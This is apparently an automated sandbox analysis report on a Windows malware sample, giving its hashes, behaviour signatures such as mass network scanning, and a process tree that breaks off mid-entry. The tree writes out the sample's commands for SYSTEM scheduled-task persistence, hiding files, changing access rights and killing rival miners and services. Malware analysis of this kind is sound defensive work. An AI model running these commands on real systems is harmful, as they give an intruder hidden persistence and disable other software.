Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/01/2024, 01:00

General

  • Target

    44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe

  • Size

    2.5MB

  • MD5

    0692382a5ccf0b0b9406a434352bcd66

  • SHA1

    d67f6d9f3353d712c13a96b00f87f4c9d511e26d

  • SHA256

    44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a

  • SHA512

    35d854e0e3cd237bbec6acb3fcbc0692b30333645fff0ed4320853e9c7c1caa6d9d12b0dc6a1c8515126d43695769d334a4a79b4cc1021ca33a7ddaab12805f6

  • SSDEEP

    49152:5wTtKTyEJdyyUa6PrvMrKQHBhzFrBRucp2uBUYYs2aoywX7AqomhDHsH:5atKOMFkxQHBBZOtuBUg2aKXTJMH

Score
9/10

Malware Config

Signatures

  • Contacts a large (17966) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 5 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 10 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 55 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with WMI 15 IoCs
  • Kills process with taskkill 57 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
    "C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\Fonts\Mysql\ctfmon.exe
      "C:\Windows\Fonts\Mysql\ctfmon.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      PID:2688
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Windows\Fonts\Mysql\same.bat" "
        3⤵
        • Drops file in Drivers directory
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2936
        • C:\Windows\SysWOW64\net.exe
          net stop "MicrosoftMysql"
          4⤵
            PID:1544
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop "MicrosoftMysql"
              5⤵
                PID:1688
            • C:\Windows\Fonts\Mysql\svchost.exe
              svchost stop "MicrosoftMysql"
              4⤵
              • Executes dropped EXE
              PID:3048
            • C:\Windows\SysWOW64\sc.exe
              sc delete "MicrosoftMysql"
              4⤵
              • Launches sc.exe
              PID:2136
            • C:\Windows\Fonts\Mysql\svchost.exe
              svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
              4⤵
                PID:2820
              • C:\Windows\SysWOW64\sc.exe
                sc delete "MicrosoftMssql"
                4⤵
                • Launches sc.exe
                PID:1960
              • C:\Windows\Fonts\Mysql\svchost.exe
                svchost stop "MicrosoftFonts"
                4⤵
                • Executes dropped EXE
                PID:3028
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1 -n 20
                4⤵
                • Runs ping.exe
                PID:2808
              • C:\Windows\Fonts\Mysql\svchost.exe
                svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
                4⤵
                  PID:2568
                • C:\Windows\Fonts\Mysql\svchost.exe
                  svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
                  4⤵
                  • Executes dropped EXE
                  PID:1140
                • C:\Windows\SysWOW64\net.exe
                  net stop "MicrosoftMssql"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2976
                • C:\Windows\Fonts\Mysql\svchost.exe
                  svchost start "MicrosoftMysql"
                  4⤵
                  • Executes dropped EXE
                  PID:2684
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                  4⤵
                    PID:2088
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM
                    4⤵
                    • Creates scheduled task(s)
                    PID:1988
                  • C:\Windows\SysWOW64\net.exe
                    net start "MicrosoftMysql"
                    4⤵
                      PID:1832
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
                      4⤵
                      • Creates scheduled task(s)
                      PID:900
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                      4⤵
                        PID:2000
                      • C:\Windows\SysWOW64\attrib.exe
                        attrib +h +s -r C:\Windows\System32\Tasks\At*
                        4⤵
                        • Views/modifies file attributes
                        PID:2052
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                        4⤵
                          PID:2668
                        • C:\Windows\SysWOW64\cacls.exe
                          cacls C:\windows\tasks\At2.job /c /e /t /g everyone:F
                          4⤵
                            PID:1472
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                            4⤵
                              PID:804
                            • C:\Windows\SysWOW64\cacls.exe
                              cacls C:\Windows\System32\Tasks\At2 /c /e /t /g everyone:F
                              4⤵
                                PID:1664
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\Tasks\HomeGroupProvider /p system:n
                                4⤵
                                  PID:2520
                                • C:\Windows\SysWOW64\cacls.exe
                                  cacls C:\Windows\Tasks\*fost* /p system:n
                                  4⤵
                                    PID:1424
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                    4⤵
                                      PID:2940
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                      4⤵
                                        PID:2880
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                        4⤵
                                          PID:2608
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\System32\Tasks\*Group* /p system:n
                                          4⤵
                                            PID:2584
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls C:\Windows\System32\Tasks\*ok* /p system:n
                                            4⤵
                                              PID:2648
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc start Schedule
                                              4⤵
                                              • Launches sc.exe
                                              PID:1168
                                            • C:\Windows\SysWOW64\net.exe
                                              net start Schedule
                                              4⤵
                                                PID:2732
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im Eternalblue-2.2.0.exe
                                                4⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2020
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im Doublepulsar-1.3.1.exe
                                                4⤵
                                                • Kills process with taskkill
                                                PID:2724
                                              • C:\Windows\SysWOW64\cacls.exe
                                                cacls C:\Windows\System32\Tasks\*my* /p system:n
                                                4⤵
                                                  PID:2588
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                  4⤵
                                                    PID:2704
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im one.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:1544
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im z.exe
                                                    4⤵
                                                    • Kills process with taskkill
                                                    PID:3008
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                    4⤵
                                                      PID:2640
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im c32.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:3068
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im c64.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1524
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im service.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2860
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im 32.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2848
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im 64.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2772
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im lsazs.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1076
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome..exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:996
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im Cstr.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2856
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im srvany.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:268
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im CPUInfo.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2796
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im scvsots.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:1412
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im acor.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      PID:1976
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im lsmosee.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2960
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im WUDHostServices.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2256
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im WUDHostService.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2552
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im lsmose.exe
                                                      4⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1692
                                                    • C:\Windows\SysWOW64\cacls.exe
                                                      cacls C:\Windows\System32\Tasks\*sa* /p system:n
                                                      4⤵
                                                        PID:2592
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                        4⤵
                                                          PID:2864
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                          4⤵
                                                            PID:2696
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /f /im 1sass.exe
                                                            4⤵
                                                            • Kills process with taskkill
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2080
                                                          • C:\Windows\SysWOW64\cacls.exe
                                                            cacls C:\Windows\System32\Tasks\*fost* /p system:n
                                                            4⤵
                                                              PID:2748
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                              4⤵
                                                                PID:2868
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im mssecsvc.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2128
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im mssecsvr.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:580
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TasksHostServices.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1172
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TasksHostService.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2500
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im crss.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2440
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im svsohst.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2480
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im seser.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:828
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im msinfo.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1060
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im taskmgr.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2008
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im csrs.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1988
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im path.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1224
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im spoolsrv.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1952
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im svschost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:3056
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im mscteui.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:556
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TrueServiceHost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2312
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im ServicesMgrHost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1156
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im GoogleCdoeUpdate.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1664
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im TrustedHostex.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2024
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im svhost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2368
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im WUDFHosts.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1604
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im scvhost.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:1696
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im csrse.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:2900
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net stop "mssecsvc2.0"
                                                                4⤵
                                                                  PID:2904
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "dbuxbr"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2592
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "mssecsvc2.1"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2660
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "dbuxbr" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1924
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "lbpuamoqhpoqju171" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2280
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im mssecsvr.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2724
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "mssecsvc2.0" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1688
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im mssecsvc.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1544
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "mssecsvc2.1" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1072
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im tasksche.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3008
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\svchost.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3068
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "fastuserswitchingcompatibility" start= disabled
                                                                  4⤵
                                                                  • Drops file in Windows directory
                                                                  • Launches sc.exe
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:2688
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='taskhost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\taskhost.exe'" Call Terminate
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Kills process with WMI
                                                                  PID:2820
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc config "tjuldl" start= disabled
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2296
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\Windows\\mssecsvr.exe'" Call Terminate
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Kills process with WMI
                                                                  PID:2568
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "lbpuamoqhpoqju171"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2716
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  PID:2472
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "mssecsvc2.0"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:1912
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  PID:2148
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "fastuserswitchingcompatibility"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2864
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  Wmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate
                                                                  4⤵
                                                                  • Kills process with WMI
                                                                  PID:2224
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc stop "tjuldl"
                                                                  4⤵
                                                                  • Launches sc.exe
                                                                  PID:2636
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net stop "lbpuamoqhpoqju171"
                                                                  4⤵
                                                                    PID:2752
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    Wmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvr.exe'" Call Terminate
                                                                    4⤵
                                                                    • Kills process with WMI
                                                                    PID:2928
                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                    Wmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate
                                                                    4⤵
                                                                    • Kills process with WMI
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:268
                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                    cacls C:\Windows\mssecsvr.exe /p system:n
                                                                    4⤵
                                                                      PID:1456
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls C:\Windows\tasksche.exe /p system:n
                                                                      4⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1976
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im conhosts.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:1480
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im lsmose.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:2120
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /f /im lsmosee.exe
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      PID:1528
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      Wmic Process Where "Name='conhosts.exe' And ExecutablePath='C:\\Windows\\Temp\\conhosts.exe'" Call Terminate
                                                                      4⤵
                                                                      • Kills process with WMI
                                                                      PID:2076
                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                      cacls C:\Windows\qeriuwjhrf /p system:n
                                                                      4⤵
                                                                        PID:456
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                        4⤵
                                                                          PID:1768
                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                          Wmic Process Where "Name='conhost.exe' And ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" Call Terminate
                                                                          4⤵
                                                                          • Kills process with WMI
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2324
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                          4⤵
                                                                            PID:796
                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                            Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\help\\lsmosee.exe'" Call Terminate
                                                                            4⤵
                                                                            • Kills process with WMI
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:580
                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                            Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\help\\lsmose.exe'" Call Terminate
                                                                            4⤵
                                                                            • Kills process with WMI
                                                                            PID:2360
                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                            cacls C:\Windows\mssecsvc.exe /p system:n
                                                                            4⤵
                                                                              PID:1940
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              Wmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\debug\\lsmosee.exe'" Call Terminate
                                                                              4⤵
                                                                              • Kills process with WMI
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2500
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              Wmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" Call Terminate
                                                                              4⤵
                                                                              • Kills process with WMI
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2480
                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                              Wmic Process Where "Name='conime.exe' And ExecutablePath='C:\\Progra~1\\Common~1\\conime.exe'" Call Terminate
                                                                              4⤵
                                                                              • Kills process with WMI
                                                                              PID:1992
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                              4⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1412
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                              4⤵
                                                                                PID:1468
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h +r C:\WINDOWS\Web\*.vbs
                                                                                4⤵
                                                                                • Sets file to hidden
                                                                                • Views/modifies file attributes
                                                                                PID:2556
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h +r C:\Windows\Temp\conhost.exe
                                                                                4⤵
                                                                                • Sets file to hidden
                                                                                • Views/modifies file attributes
                                                                                PID:900
                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                cacls C:\Windows\help\lsmosee.exe /p system:n
                                                                                4⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1988
                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                cacls C:\Windows\help\lsmose.exe /p system:n
                                                                                4⤵
                                                                                  PID:2164
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                  4⤵
                                                                                    PID:2452
                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                    cacls C:\Windows\debug\lsmose.exe /p system:n
                                                                                    4⤵
                                                                                      PID:1744
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                      4⤵
                                                                                        PID:1228
                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                        cacls C:\Windows\Temp\*.exe /p system:n
                                                                                        4⤵
                                                                                          PID:2116
                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                          cacls C:\Windows\debug\xmrstak_opencl_backend.dll /p system:n
                                                                                          4⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2024
                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                          attrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64
                                                                                          4⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:2676
                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                          cacls C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe /c /e /t /g system:F
                                                                                          4⤵
                                                                                            PID:1616
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                            4⤵
                                                                                              PID:2436
                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                              cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe /c /e /t /g system:F
                                                                                              4⤵
                                                                                                PID:2268
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                4⤵
                                                                                                  PID:1696
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                  4⤵
                                                                                                    PID:2616
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                    4⤵
                                                                                                      PID:1532
                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                      cacls C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 /c /e /t /g everyone:F
                                                                                                      4⤵
                                                                                                        PID:2596
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                        4⤵
                                                                                                          PID:2748
                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                          cacls C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64 /c /e /t /g system:F
                                                                                                          4⤵
                                                                                                            PID:2864
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
        PID:2600
      • C:\Windows\SysWOW64\cacls.exe
